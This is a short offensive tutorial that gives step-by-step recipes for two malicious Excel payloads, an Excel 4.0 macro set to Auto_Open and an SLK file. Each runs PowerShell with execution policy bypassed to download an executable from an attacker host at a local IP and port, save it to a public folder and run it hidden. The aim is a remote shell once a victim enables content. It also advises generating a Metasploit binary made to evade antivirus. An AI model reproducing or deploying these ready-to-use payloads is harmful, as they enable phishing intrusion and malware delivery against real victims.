Microsoft Excel Payload for initial foothold is old method but still widely used by APTs.
Microsoft Excel 4.0 Macro Payload
Right click on the workbook and click insert
Select MS Excel 4.0 Macro
paste following payload:
=EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe")
=WAIT(NOW()+"00:00:10")
=EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe")
=HALT()
Now Select first cell and rename it to Auto_Open
Save as Excel 97-2003 Workbook(XLS)
When victim Enable Content
We get shell
Microsoft Excel SLK Payload
Generate binary using metasploit. Make sure make it bypass AV.
Open Notepad and paste:
ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.88.168:8000/20.exe -outfile c:\users\public\20.exe")
C;X1;Y102;K0;EWAIT(NOW()+"00:00:10")
C;X1;Y103;K0;EEXEC("powershell.exe c:\users\public\20.exe")
C;X1;Y104;K0;EHALT()
E
And Save ask Test.slk
When victim double click and Enable Content
It downloads the binary and execute, as a result we get shell